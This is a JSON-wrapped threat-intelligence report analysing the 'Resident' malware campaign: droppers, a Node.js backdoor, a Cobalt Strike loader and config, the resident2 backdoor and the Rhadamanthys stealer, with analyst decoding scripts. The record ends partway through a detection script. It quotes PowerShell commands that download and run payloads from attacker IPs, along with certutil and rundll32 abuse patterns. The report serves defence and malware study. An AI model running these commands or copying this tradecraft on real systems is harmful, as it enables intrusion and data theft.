{
	"id": "9b65f33b-a59e-4a40-b888-eec80ce66e95",
	"created_at": "2026-04-06T00:16:30.178903Z",
	"updated_at": "2026-04-10T03:37:09.357144Z",
	"deleted_at": null,
	"sha1_hash": "88d7e23d50bdd2004b74e136c76a22034d7d5563",
	"title": "eSentire Threat Intelligence Malware Analysis: Resident Campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 18245008,
	"plain_text": "eSentire Threat Intelligence Malware Analysis: Resident Campaign\r\nBy eSentire Threat Response Unit (TRU)\r\nArchived: 2026-04-05 18:09:02 UTC\r\nSince November 2022, the eSentire Threat Response Unit (TRU) has observed the resurgence of what we believe to be a\r\nmalicious campaign targeting the manufacturing, commercial, and healthcare organizations. The campaign is similar to the\r\none reported by Trend Micro researchers in December 2020. The campaign is believed to be conducted by native Russian\r\nspeaking threat actor(s).\r\nThis malware analysis references four separate incidents where our machine-learning PowerShell classifier, Bluesteel\r\ndetected malicious PowerShell commands executing a script from an attacker hosted domain. It delves deeper into the\r\ntechnical details of how the Resident campaign operates and our security recommendations to protect your organization\r\nfrom being exploited.\r\nKey Takeaways\r\nThe Resident campaign is named after the custom backdoor that the threat actor(s) retrieved from one of the\r\nestablished sessions with the command and control (C2) server.\r\nThe backdoor has the capabilities to achieve persistence and deploy secondary payloads.\r\nThe Resident campaign is delivered via drive-by downloads leveraging compromised websites and phishing emails\r\ncontaining the fake OneDrive attachment that leads to the page hosting the JavaScript payload.\r\nResident threat actor(s) retrieve multiple MSI installers that contain the tools used for post-compromise objectives.\r\neSentire's Threat Intelligence team has observed the campaign delivering Rhadamanthys stealer.\r\nThese insights are based on four separate incidents targeting manufacturing, commercial, and healthcare\r\norganizations.\r\nInitial Infection Vector\r\nThe initial infection vector we have observed is a phishing email. It should be noted that the SANS Internet Storm Center\r\nhas also observed the campaign spreading via drive-by downloads. 
The threat actor(s) use email hijacking to deliver\r\nthe malicious payload as a PDF attachment. The attacker(s) add the sender domain to a Vesta Control Panel instance so that it looks\r\nlegitimate when the user browses to the domain (Figure 1).\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 1 of 34\n\nFigure 1: Phishing email\r\nThe PDF attachment contains a link that sends the user to the saprefx[.]com domain. Based on the user's geolocation, that domain either redirects the user to the final domain hosting the JavaScript payload or displays\r\na TeamViewer installer page, as shown below (Figure 2).\r\nFigure 2: The redirect chain\r\nThe JavaScript payload is usually hosted on compromised WordPress websites. An example of the initial JavaScript payload\r\nis shown in Figure 3.\r\nFigure 3: JavaScript snippet\r\nWhen the user opens the JavaScript file, the script directly downloads and executes the MSI package through the Windows Installer COM object's InstallProduct method. In our example, the first retrieved MSI installer dropped a Terminal_App_Service VBS (Visual Basic\r\nScript) file under the ProgramData\\Cis folder (we also observed the name Imdb.vbs being used (MD5:\r\nc3f9b1fa3bcde637ec3d88ef6a350977)).\r\nThe VBS file reaches out to the C2 with the serial number of the infected machine's C: drive as a parameter, then\r\nretrieves a Windows Installer product and runs it in the background without the user's knowledge. 
The script then enters a\r\nloop in which it keeps retrieving and installing MSI files every 9368 milliseconds (Figure 4).\r\nFigure 4: Malicious VBS script dropped from the first MSI file\r\nThe retrieved MSI files (we observed approximately three MSI files retrieved by the VBS script) contain\r\nthe tools or scripts used to take a screenshot of the host at the time of infection; in this case an AutoHotKey script did this. We\r\nhave also observed AutoIt scripts, Python scripts and the i_view32.exe tool being used to take the screenshot of the host.\r\nCase Study #1\r\nDuring the first incident, our TRU team observed the threat actor dropping the backdoor, a Cobalt Strike payload, and the\r\nPython script responsible for taking a screenshot of the host. Here are some of the files observed dropped on the\r\nendpoint during the first incident:\r\nsdv.vbs (C:\\ProgramData\\sdv) – MD5: 0e5598b0a72bf83378056ae52be6eda4, the script uses the WScript.Shell object to\r\nquery Windows Management Instrumentation (WMI) for information about active processes: caption, command\r\nline, creation date, computer name, executable path, OS (Operating System) name, and Windows version. It then\r\nsends the gathered information along with the C:\\ drive serial number to the C2 (Figure 5).\r\nFigure 5: sdv.vbs script\r\nscreen1.pyw (C:\\ProgramData\\sdv) – MD5: a628240139c04ec84c0e110ede5bb40b, Python script responsible\r\nfor taking a screenshot and sending it to the C2 together with the drive serial number (Figure 6).\r\nFigure 6: snippet of screen1.pyw\r\nhcmd.exe (AppData\\Roaming\\hcmd) – renamed node.exe, MD5: f5182a0fa1f87c2c7538b9d8948ad3ce\r\nImdb.vbs (MD5: c3f9b1fa3bcde637ec3d88ef6a350977).\r\nindex.js (MD5: 5bdb1ac2a38ab3e43601eee055b1983f), under the AppData\\Roaming\\hcmd folder – one of the main\r\nscripts deployed by the Resident campaign. 
The script serves as a backdoor and runs with a specific argument via the\r\nrenamed node.exe binary (hcmd.exe): hcmd.exe index.js 2450639401. The script uses Socket.IO for bi-directional communication and sets up a command line interface that lets the infected host connect to the C2\r\nserver on port 3000 using the given 'hwid' (Hardware ID) and 'password'.\r\nOnce the connection to the C2 is established, the code registers event listeners for the connect, disconnect, cmd-ping\r\nand cmd-command events. The connect and disconnect handlers only log a message to the console. When the cmd-ping event is triggered, the code replies with a cmd-pong message carrying the hwid. Finally,\r\nwhen the cmd-command event is triggered, the code executes the command supplied by the C2 in a shell and\r\nlogs the output (Figure 7).\r\nFigure 7: Snippet of index.js backdoor\r\nnode_modules directory that contains the dependencies for node.exe (AppData\\Roaming\\hcmd).\r\n7765676.exe (similar to the Cobalt Strike PowerShell DLL payload that we will mention later in this report) – the\r\nCobalt Strike executable that was dropped through the backdoor's active session with the C2 server.\r\nWe have observed persistence being established via the Startup folder. Two shortcut files were created there.\r\nCUGraphic.lnk (Startup persistence) – the shortcut is responsible for launching the AutoHotKey script under\r\nProgramData\\2020 (Figure 8).\r\nFigure 8: CUGraphic.lnk content\r\nImdb.lnk (Startup persistence) – the shortcut file points to the directory C:\\ProgramData\\Cis\\. Upon running\r\nthe malicious MSI installer, it installs the malicious “application”, which is the Imdb.vbs script. 
The shortcut's Application ID\r\nin the registry (e.g., HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-1866265027-1870850910-1579135973-1000\\Products\\985AA98E08645254995AFEA67F8AC3B6\\Features\\) is what allows\r\nthe VBS file to run at startup even though the shortcut only points to a directory.\r\nImdb.lnk is a Windows Installer advertised shortcut: instead of a plain target path it carries the product code of the installed package (stored under Products in its compressed form) and the feature to launch. When the shell runs such a shortcut, Windows Installer resolves the product and feature through the Products\\...\\Features keys to the installed component, here the Imdb.vbs script, and launches it; the same mechanism is what lets Windows repair or install an application on demand when its shortcut is used (Figure 9).\r\nFigure 9: Shortcut file, installed application and the Application ID in the registry\r\nSo, what about the PowerShell?\r\nThe malicious PowerShell command mentioned before retrieves and executes a PowerShell script from 31.41.244[.]142.\r\nThe PowerShell script loads kernel32.dll and crypt32.dll via LoadLibraryA and uses the CryptStringToBinaryA function\r\nfrom crypt32.dll to convert the base64 string to binary (Figure 10).\r\nFigure 10: Malicious PowerShell script containing the Cobalt Strike payload hosted on the attacker's domain\r\nIt then creates a file mapping over the binary data with the CreateFileMappingA function from kernel32.dll and maps the\r\nmalicious payload into memory with MapViewOfFile, also from kernel32.dll. Finally, it invokes the mapped\r\npayload through the Invoke method.\r\nThe malicious payload, which is the Cobalt Strike loader (MD5: f8d780f77553e7780ebcf917844571b0), enumerates running processes with CreateToolhelp32Snapshot looking for\r\n“powershell.exe”. It then attempts to open that process with read and write access rights. 
If it fails to obtain that access, the payload terminates (Figure 11).\r\nFigure 11: The payload enumerates for the PowerShell process\r\nThe loader uses API hashing, shown in Figure 12.\r\nFigure 12: Hashed APIs\r\nSpecifically, it hashes API names with the JAMCRC variant of CRC32: the reflected CRC32 computed with the polynomial 0xEDB88320 (the same table-driven CRC32 checksum, Figure 13) but without the final XOR with 0xFFFFFFFF, so each hash is the bitwise complement of the standard CRC32 of the name.\r\nFigure 13: CRC32 checksum table\r\nThe malicious payload first resolves APIs from kernel32.dll, then the rest from libraries such as advapi32.dll,\r\nwininet.dll and ws2_32.dll. A quick IDAPython script can compute the hash of each candidate API name and rename the DWORDs that store the hash values\r\n(Figure 14).\r\nFigure 14: IDAPython script to calculate the CRC32 JAMCRC hash and rename the DWORDs\r\nThe loader sample allocates memory and decodes the payload to an MZRE header, which is characteristic of Cobalt Strike payloads built with the\r\nmagic_mz_x86 option to override the MZ header. 
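Before turning to the decoder, here is the JAMCRC hashing just described as a worked example. This is added Python analyst tooling written for this page; it is neither the loader's code nor eSentire's IDAPython script from Figure 14. The candidate API names are an assumed list (extend it with the full export tables of the four DLLs), and the hashed DWORDs it resolves are computed from those names rather than read from the sample.

```python
import zlib

# Constructed candidate list: exports a loader of this kind typically resolves from
# kernel32/advapi32/wininet/ws2_32 (assumed; extend with full export tables).
API_NAMES = [
    "LoadLibraryA", "GetProcAddress", "VirtualAlloc", "VirtualProtect",
    "CreateToolhelp32Snapshot", "Process32First", "Process32Next", "OpenProcess",
    "CreateFileMappingA", "MapViewOfFile", "InternetOpenA", "WSAStartup",
]

CRC32_POLY = 0xEDB88320  # reflected CRC-32 polynomial, as in the loader's table


def make_crc32_table(poly=CRC32_POLY):
    """Build the 256-entry lookup table the loader carries in its data (Figure 13)."""
    table = []
    for i in range(256):
        crc = i
        for _ in range(8):
            crc = (crc >> 1) ^ poly if crc & 1 else crc >> 1
        table.append(crc)
    return table


CRC32_TABLE = make_crc32_table()


def jamcrc(data: bytes) -> int:
    """JAMCRC: table-driven reflected CRC-32, init 0xFFFFFFFF, and NO final XOR."""
    crc = 0xFFFFFFFF
    for b in data:
        crc = CRC32_TABLE[(crc ^ b) & 0xFF] ^ (crc >> 8)
    return crc


def jamcrc_fast(data: bytes) -> int:
    """Same value via zlib: standard CRC-32 differs from JAMCRC only by the final XOR."""
    return zlib.crc32(data) ^ 0xFFFFFFFF


def build_hash_map(names=API_NAMES) -> dict:
    """Map JAMCRC hash -> API name for every candidate export."""
    return {jamcrc(n.encode("ascii")): n for n in names}


def resolve_hashes(hashed_dwords, hash_map=None) -> list:
    """Resolve the DWORDs stored in the loader back to names; unknown hashes are
    labelled so the analyst knows to widen the candidate list."""
    if hash_map is None:
        hash_map = build_hash_map()
    return [hash_map.get(h, f"unknown_{h:08x}") for h in hashed_dwords]


if __name__ == "__main__":
    # Sample DWORDs computed here from known names plus one deliberate miss.
    sample_dwords = [jamcrc(b"VirtualAlloc"), jamcrc(b"OpenProcess"), 0xDEADBEEF]
    for dword, name in zip(sample_dwords, resolve_hashes(sample_dwords)):
        print(f"{dword:08x} -> {name}")
```

Inside IDA the same map drives the renaming: iterate the DWORDs holding the hashes, look each one up in build_hash_map(), and call idc.set_name(ea, name) for the hits. A quick sanity check that the variant is right before chasing misses is the standard check string 123456789, whose JAMCRC is 0x340BC6D9 (the complement of the familiar CRC-32 value 0xCBF43926); once that matches, an unresolved DWORD almost always means a missing candidate name rather than a different algorithm.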
The decoding routine uses a bitwise rotation, as shown in Figure 15.\r\nFigure 15: The loader allocates the memory and partially decrypts the Cobalt Strike payload\r\nThe decoding function can be implemented as follows (each byte is rotated right by its 1-based position modulo 8, so every eighth byte is left unchanged):\r\ndef ror_decode(byte_array):\r\n    # byte_array: the encoded bytes copied from the allocated buffer\r\n    out = bytearray()\r\n    n = 1\r\n    for byte in byte_array:\r\n        b = byte \u0026 255\r\n        # rotate right by (n \u0026 7) bits; a rotation of 0 returns b unchanged\r\n        ror = ((b \u003e\u003e (n \u0026 7)) | (b \u003c\u003c (8 - (n \u0026 7)))) \u0026 255\r\n        out.append(ror)\r\n        n += 1\r\n    return bytes(out)\r\nThe Cobalt Strike configuration is shown below:\r\n{\r\n \"BeaconType\": [\r\n \"HTTP\"\r\n ],\r\n \"Port\": 80,\r\n \"SleepTime\": 60000,\r\n \"MaxGetSize\": 1048576,\r\n \"Jitter\": 0,\r\n \"C2Server\": \"31.41.244[.]142,/g.pixel\",\r\n \"HttpPostUri\": \"/submit.php\",\r\n \"Malleable_C2_Instructions\": [],\r\n \"SpawnTo\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"HttpGet_Verb\": \"GET\",\r\n \"HttpPost_Verb\": \"POST\",\r\n \"HttpPostChunk\": 0,\r\n \"Spawnto_x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\",\r\n \"Spawnto_x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\",\r\n \"CryptoScheme\": 0,\r\n \"Proxy_Behavior\": \"Use IE settings\",\r\n \"Watermark\": 1580103824,\r\n \"bStageCleanup\": \"False\",\r\n \"bCFGCaution\": \"False\",\r\n \"KillDate\": 0,\r\n \"bProcInject_StartRWX\": \"True\",\r\n \"bProcInject_UseRWX\": \"True\",\r\n \"bProcInject_MinAllocSize\": 0,\r\n \"ProcInject_PrependAppend_x86\": \"Empty\",\r\n \"ProcInject_PrependAppend_x64\": \"Empty\",\r\n \"ProcInject_Execute\": [\r\n \"CreateThread\",\r\n \"SetThreadContext\",\r\n \"CreateRemoteThread\",\r\n \"RtlCreateUserThread\"\r\n ],\r\n \"ProcInject_AllocationMethod\": \"VirtualAllocEx\",\r\n \"bUsesCookies\": \"True\",\r\n \"HostHeader\": \"\"\r\n}\r\nFigure 16: Cobalt Strike payload loaded into memory\r\nCase Study #2\r\nIn this incident, the threat actor(s) deployed their custom 
written backdoor tool named resident2.exe. The backdoor\r\nresident2.exe was dropped from the Cobalt Strike session and marks the end of the infection chain (Figure 17). Tools\r\nsuch as windows-kill.exe, which terminates Windows processes, and netping.exe (presumably a network ping tool) were\r\nalso brought onboard by the threat actor.\r\nFigure 17: Infection chain (1)\r\nThe files we observed being dropped in this case:\r\ns.au3 – (MD5: b8822d99850ac70cb3de0e1d39639add) – AutoIt script (dropped under C:\\ProgramData\\jaf\\s.au3).\r\nThe script takes a screenshot of the infected machine using functions such\r\nas _ScreenCapture_SetJPGQuality() and _ScreenCapture_Capture(); it then reads the content of the screenshot file\r\n(s.jpg), sets the request headers and sends it to the C2 server together with the serial number of the C:\\ drive recorded by the\r\ns.vbs script (Figure 18).\r\nFigure 18: s.au3 script (screenshot capture)\r\nindex.js (AppData\\Roaming\\hcmd\\)\r\nau3.exe (ProgramData\\2020\\) – AutoHotKey interpreter.\r\ns.exe (ProgramData\\jaf\\) – AutoIt interpreter.\r\nImdb.vbs (C:\\ProgramData\\Cis).\r\nhcmd.exe (AppData\\Roaming\\hcmd\\hcmd.exe).\r\ns.vbs (ProgramData\\jaf\\) – gets the serial number of the C:\\ drive and writes it to the text file s.txt (Figure 19).\r\nFigure 19: s.vbs script\r\nwindows-kill.exe (AppData\\Roaming\\hcmd\\node_modules\\nodemon\\bin\\) – Windows process “killer”; note that this binary ships with the nodemon npm package, so its presence under node_modules is expected once nodemon is installed and it is its use by the actor that matters.\r\nnetping.exe (downloaded via PowerShell: powershell Invoke-WebRequest hxxps://temp[.]sh/BOTnt/netping.exe -\r\nOutFile C:\\programdata\\netping.exe) – we could not retrieve the file from the system, but we assume it is a\r\nnetwork ping tool that pings a range of IP addresses.\r\nresident2.exe – the custom written backdoor.\r\nAs you might have noticed, the index.js backdoor is also present in this case. 
The backdoor session was established via the\r\ncommand hcmd.exe index.js 2094656165.\r\nDuring the established backdoor session, two Cobalt Strike payloads were downloaded from 62.204.41[.]171 via the\r\nfollowing commands:\r\npowershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('hxxp://62.204.41[.]171:80/a'))\"\r\npowershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('hxxp://62.204.41[.]171:80/b'))\"\r\nThe threat actor(s) also performed reconnaissance with the following commands:\r\nnet group “domains admins” /domain\r\nwhoami /groups\r\nipconfig /all\r\nWhat is resident2.exe?\r\nThe binary is a 32-bit executable written in C. Upon successful execution, the binary creates a copy of\r\nitself under C:\\ProgramData\\RtlUpd as RtlUpd.exe. Persistence is achieved via a scheduled task named “RtlUpd” that\r\nruns every 10 minutes, starting from the time the binary was first executed (Figure 20).\r\nFigure 20: Task Scheduler function\r\nThe strings in the binary are encrypted with RC4 (Figure 21).\r\nFigure 21: RC4 KSA algorithm\r\nThe encrypted strings are stored in the .rdata section; the decryption routine skips the first 4 bytes of each\r\nhexadecimal string, takes the next 4-5 bytes as the RC4 key, and treats the rest of the string as the encrypted data (Figure 22).\r\nFigure 22: The structure of the encrypted data and key\r\nThe binary sends a custom base64-encoded, RC4-encrypted string in its HTTP GET requests, as shown in Figure 23.\r\nFigure 23: GET request within the pcap data\r\nThe function in Figure 24 retrieves the volume serial number, computer name, and username of the current system. 
It\r\nthen base64-encodes the retrieved values.\r\nFigure 24: Retrieving the data and base64-encoding them\r\nThe CRC32 function in Figure 25 is meant to calculate a checksum over the computer name and over the username separately,\r\nalthough it produced unexpected checksum values for reasons we could not determine.\r\nFigure 25: Implementation of CRC32 in the binary\r\nMoving forward, the binary builds a string from the pattern %d|%08X%08X|%d|%d|%d|%d|%hs|%hs, which can be\r\ntranslated into |\u003cVolumeSerialNumber||||calc_val|| (the second field is the volume serial number and the sixth is calc_val).\r\nOne of the fields can be 0 or the hexadecimal representation of the image base address of the binary. calc_val holds a value calculated\r\nfrom the wProcessorArchitecture value plus the value returned by GetSystemMetrics.\r\nThe GetSystemMetrics call asks for SM_SERVERR2, which returns the build number if the system is Windows Server 2003 R2 and 0 otherwise; if the value is\r\n0, a1 is set to 4, otherwise to 6 (Figure 26).\r\nFigure 26: String builder and calc_val functions\r\nNext, the binary uses the generated string and “24de21a8-a70b-4364-82b1-dc08434c93d7” as an RC4 key to\r\nproduce a value that feeds the base64-encoding routine together with the generated string\r\nmentioned before. The final result is a custom base64-encoded string (Figure 27).\r\nFigure 27: Custom base64-encoding algorithm\r\nFurther analyzing the binary, we noticed that it checks whether its command line contains “/p”; if it does,\r\nthe function returns 1 and the binary reaches out to the C2. 
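Returning to the string encryption described above (Figures 21 and 22), the following added Python decryptor applies that layout: skip the leading 4 bytes, take the next bytes as the RC4 key, and decrypt the remainder. It is written for this page and is not resident2's own code. Because the page gives the key as 4 to 5 bytes, the key length is a parameter; the hex encoding of the stored strings follows the page's wording and is an assumption; and the sample blob is constructed here rather than extracted from the binary.

```python
import binascii


def rc4_ksa(key: bytes) -> list:
    """RC4 key-scheduling algorithm (Figure 21): permute S with the key."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """RC4 PRGA keystream XORed with data; encryption and decryption are the same op."""
    S = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def split_encrypted_string(blob: bytes, skip: int = 4, key_len: int = 4):
    """Apply the layout from Figure 22: [skipped bytes][key][ciphertext].
    skip and key_len are parameters because the page gives the key as 4-5 bytes."""
    if len(blob) < skip + key_len + 1:
        raise ValueError("blob too short for header + key + data")
    key = blob[skip:skip + key_len]
    return key, blob[skip + key_len:]


def decrypt_string(blob: bytes, skip: int = 4, key_len: int = 4) -> bytes:
    key, ct = split_encrypted_string(blob, skip, key_len)
    return rc4_crypt(key, ct)


def decrypt_hex_string(hex_str: str, **kw) -> bytes:
    """The stored strings are described as hexadecimal (assumption): decode, then decrypt."""
    return decrypt_string(binascii.unhexlify(hex_str), **kw)


def build_blob(plaintext: bytes, key: bytes, header: bytes = b"\x00\x00\x00\x00") -> bytes:
    """Construct a sample blob in the same layout (test data only, not from the malware)."""
    return header + key + rc4_crypt(key, plaintext)


if __name__ == "__main__":
    # Constructed sample: a plausible string with a 4-byte key chosen here.
    sample = build_blob(b"RtlUpd.exe", b"\x13\x37\x42\x99")
    print(sample.hex(), "->", decrypt_hex_string(sample.hex()))
```

When running this over the real .rdata strings, try key_len=4 and key_len=5 for each blob and keep whichever yields printable output; RC4 gives no integrity check, so a wrong key length produces garbage rather than an error.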
If the binary is run with no arguments, it proceeds to drop RtlUpd.exe under\r\n%ALLUSERSPROFILE%\\RtlUpd.\r\nWe noticed that the binary can also drop RtlUpd.dll under %ALLUSERSPROFILE%\\RtlUpd\r\nand %APPDATA%\\RtlUpd; it then schedules tasks to run the dropped file, whether it is RtlUpd.exe or RtlUpd.dll. The purpose of the\r\nargument check is to determine whether a copy of the payload already exists on the system (the scheduled task runs the\r\ncopied binary with the “/p” argument); if the copy exists, it simply initiates the C2 connection.\r\nThe binary resolves its APIs dynamically, as shown in Figure 28.\r\nFigure 28: Resolving APIs dynamically\r\nOne of the main functionalities of the resident2 binary is the ability to execute payloads placed by the threat\r\nactor(s) during hands-on intrusion activity or retrieved directly from the C2. The binary abuses LOLBAS (Living Off the\r\nLand Binaries and Scripts) – rundll32.exe with shell32.dll, and certutil.exe – to run the malicious payloads. The binary checks whether the payload has\r\nan “.exe” or “.dll” extension.\r\nIf the payload is an executable, the command “rundll32.exe shell32.dll,ShellExec_RunDLL %s” is executed; if the\r\npayload is a DLL, the command “rundll32.exe %s, Start” is run, where %s is the payload filename (Figure 29).\r\nFigure 29: Extension check and execute the commands accordingly\r\neSentire TRU is almost certain that one purpose of this function is to run the Cobalt Strike payload deployed by the threat\r\nactor(s): one of the Cobalt Strike payloads we analyzed exported a function named “Start”, matching the export the DLL branch calls.\r\nAs for certutil.exe, its “-decode” parameter decodes Base64-encoded data. 
In our case, the attacker(s) can\r\ndecode a Base64-encoded payload hidden within a certificate file (Figure 30).\r\nFigure 30: Example of how attacker(s) can abuse certutil.exe\r\nA scheduled task is created to run the payloads using the techniques described above; its class identifier\r\n(CLSID) is calculated from the name of the payload, its unique identifier and the volume serial number (Figure 31).\r\nFigure 31: GUID build\r\nCase Study #3\r\nIn this incident, the threat actors initiated their intrusion by abusing wscript.exe to launch the malicious JavaScript file.\r\nAdditionally, the graphic editor tool i_view32.exe was dropped to take a screenshot of the infected host. The threat\r\nactor also attempted to deploy the Rhadamanthys stealer (Figure 32).\r\nFigure 32: Infection chain (2)\r\nFiles dropped:\r\napp.js – (C:\\ProgramData\\Dored) – MD5: 89e320093ce9d3a9e61e58c1121b76e7, the script runs an executable file\r\ncalled i_view32.exe (IrfanView – graphic viewer, editor tool) with two arguments \"/capture\" and\r\n\"/convert=skev.jpg\". 
This command captures the screen and saves it as the JPEG file skev.jpg (Figure 33).\r\nFigure 33: app.js script\r\nindex.js (C:\\ProgramData\\Dored) – MD5: 44839c07923d8a37f49782e6a2567950, the script sends the screenshot\r\ntaken with the IrfanView tool, along with the drive serial number, to the C2 (Figure 34).\r\nFigure 34: index.js script\r\nsdv.vbs – (ProgramData\\sdv\\) – gets the serial number of the C:\\ drive and writes it to the text file t.txt.\r\ni_view32.exe – graphic editor tool\r\nskev.jpg – screenshot image (C:\\ProgramData\\Dored)\r\nCUGraphic.lnk\r\nau3.ahk (ProgramData\\2020\\)\r\nau3.exe\r\nThe Rhadamanthys Stealer Case\r\nDuring case study #3 (Figure 35), at the end of the infection chain and during the established C2 session, the threat actor(s)\r\nattempted to run the Rhadamanthys Stealer on the host.\r\nFigure 35: Stealer execution\r\nThe stealer, or more precisely its loader component, can be readily identified by the rundll32.exe process spawning\r\nfrom the initial payload with the command pattern: rundll32.exe nsis_uns{hexadecimal_numbers}, PrintUIEntry\r\n|5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|\r\n{redacted}\r\nThe nsis_uns DLL is dropped under the path C:\\Users\\\\AppData\\Roaming\\ and is used to map the retrieved shellcode into\r\nmemory and execute it.\r\nRhadamanthys Stealer first appeared in September 2022 on a Russian-speaking forum (Figure 36).\r\nFigure 36: Rhadamanthys Stealer for sale\r\nCurrently the stealer developer is working on integrating a keylogger plugin into the stealer (Figure 37).\r\nFigure 37: Stealer developer's post on the hacking forum\r\nThe stealer exfiltrates system information, screenshots, browser 
credentials and cookies, crypto wallets, FTP and mail clients,\r\ntwo-factor authentication applications (RoboForm, WinAuth, Authy Desktop), the KeePass password manager, VPN clients,\r\nmessenger data (Psi+, Pidgin, TOX, Discord, Telegram), Steam, TeamViewer and SecureCRT; additionally it exfiltrates\r\nNoteFly, Notezilla, Simple Sticky Notes, and Windows 7 and 10 Sticky Notes data. The stealer admin panel runs on\r\nCentOS 7 (Ubuntu 16) panels.\r\nSome of the crypto wallet browser extensions the stealer targets: Auvitas Wallet, BitApp, Crocobit, Exodus, Finnie, GuildWallet, ICONex, Jaxx, Keplr, Liquality, MTV Wallet, Math, Metamask, Mobox, Nifty, Oxygen, Phantom, Rabet Wallet, Ronin Wallet, Slope Wallet, Sollet, Starcoin, Swash, Terra Station, Tron, XinPay, Yoroi Wallet, ZilPay Wallet, binance, coin98.\r\nThe stealer can brute-force crypto wallets using a list of custom passwords.\r\nBrowsers: 360ChromeX, 360 Secure Browser, 7Star, AVAST Browser, AVG Browser, Atom, Avant Browser, BlackHawk, Blisk, Brave, CCleaner Browser, CentBrowser, Chedot, CocCoc, Coowon, Cyberfox, Dragon, Element Browser, Epic Privacy Browser, Falkon, Firefox, Firefox Nightly, GhostBrowser, Google Chrome, Hummingbird, IceDragon, Iridium, K-Meleon, Kinza, Kometa Browser, SLBrowser, MapleStudio, Maxthon, Naver Whale, Opera, Opera GX, Opera Neon, QQBrowser, SRWare Iron, SeaMonkey, Sleipnir5, Slimjet, Superbird, Twinkstar, UCBrowser, Xvast, citrio, Pale Moon, Torch Web Browser, UR Browser, Vivaldi.\r\nCrypto wallets: Armory, AtomicWallet, Atomicdex, Binance Wallet, Bisq, BitcoinCore, BitcoinGold, Bytecoin, Coinomi wallets, DashCore, DeFi-Wallet, Defichain-electrum, Dogecoin, Electron Cash, Electrum, Electrum-LTC, Ethereum Wallet, Exodus, Frame, Guarda, Jaxx, LitecoinCore, Monero, MyCrypto, MyMonero, Safepay, Solar wallet, Tokenpocket, WalletWasabi, Zap, Zcash, Zecwallet Lite.\r\nFTP clients: Cyberduck, FTP Navigator, FTPRush, FlashFXP, Smartftp, TotalCommander, Winscp, Ws_ftp, Coreftp.\r\nMail clients: CCheckMail, Claws-mail, GmailNotifierPro, Mailbird, Outlook, PostboxApp, TheBat!, Thunderbird, TrulyMail, eM Client, Foxmail.\r\nVPN: AzireVPN, NordVPN, OpenVPN, PrivateVPN_Global_AB, ProtonVPN, WindscribeVPN.\r\nThe stealer can retrieve files from the host via the File Grabber module (Figure 38).\r\nFigure 38: File Grabber module\r\nThe Extension module contains the functionality to run PowerShell scripts and download binaries directly from the\r\nInternet via PowerShell (Figure 39).\r\nFigure 39: Extension module\r\nThe Task section allows the stealer to perform certain actions upon execution (Figure 40).\r\nFigure 40: Task configuration\r\nThe Server section (Figure 41) contains the main configuration for the stealer, such as the option to enable area restrictions.\r\nIf the option is on, the stealer will not run in countries such as Russia and Ukraine, although the stealer developer\r\nstated that the stealer will not work in Commonwealth of Independent States (CIS) countries.\r\nIn addition, it configures the ports for the server-side binding address (the main communication with the C2, including\r\nshellcode retrieval after successful execution) and the admin panel binding address (the attacker can change the admin panel port from\r\nthe default :443 to any other port).\r\nThe attacker can also change the gateway address, which is the directory from which the stealer retrieves the shellcode; “/blob”\r\nis the default directory.\r\nFigure 41: 
Snippet of the Server section\r\nThe Build section (Figure 42) specifies how the binary is built, including options to enable anti-debugging and anti-VM checks,\r\nto launch the executable with administrative privileges, and the file pump feature, which increases the file size by padding it with\r\nzeros to bypass antivirus and some sandbox checks. The exfiltrated data is transmitted via WebSocket over an AES-256\r\nencrypted channel.\r\nFigure 42: Build section\r\nIf the Task section is configured, the process .tmp.exe is spawned, as shown in Figure 43.\r\nFigure 43: Process tree with Task and Extension modules enabled\r\ndllhost.exe is spawned if the Extension module is configured to retrieve additional payloads or run PowerShell\r\nscripts/commands.\r\nCase Study #4\r\nIn this incident, the threat actors first leveraged au3.exe, which then spawned a series of other malicious executables.\r\nFigure 44: Infection chain (3)\r\nFiles dropped by the threat actor(s):\r\nTerminal App Service.vbs (C:\\ProgramData\\Cis)\r\napp.js (C:\\ProgramData\\Dored) – similar to the previous case\r\nau3.exe (C:\\ProgramData\\2020)\r\nau3.ahk (C:\\ProgramData\\2020)\r\nindex.js (C:\\ProgramData\\Dored) – screenshot sender script, similar to the 3rd incident\r\ni_view32.exe (C:\\ProgramData\\Dored)\r\nskev.jpg – screenshot image (C:\\ProgramData\\Dored)\r\nhcmd.exe (AppData\\Roaming\\hcmd\\hcmd.exe)\r\nindex.js (AppData\\Roaming\\hcmd) – backdoor\r\nAfter obtaining the backdoor session to the infected machine via the command hcmd.exe index.js 2450639401, the actor(s)\r\nran the systeminfo command to collect detailed system information and attempted to ping the Domain Controller. 
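The command lines quoted across the four cases share a handful of recognisable shapes: the hcmd.exe index.js <id> backdoor launch, the PowerShell IEX download cradles and Invoke-WebRequest fetches, rundll32.exe with shell32.dll,ShellExec_RunDLL or the nsis_uns..., PrintUIEntry loader pattern, certutil -decode, wscript.exe launching a .js file, IrfanView's /capture, and the net group query for domain admins. The following added Python example runs simple rules over process-creation command lines; it is written for this page and is not eSentire's detection content. The sample events are constructed to mirror the report's command lines (IPs left defanged) and are not real telemetry, and the rule names are this example's own.

```python
import re

# Constructed process-creation command lines modelled on those quoted in this
# report (not real telemetry; IPs and URLs kept defanged).
SAMPLE_EVENTS = [
    r"C:\Users\user\AppData\Roaming\hcmd\hcmd.exe index.js 2450639401",
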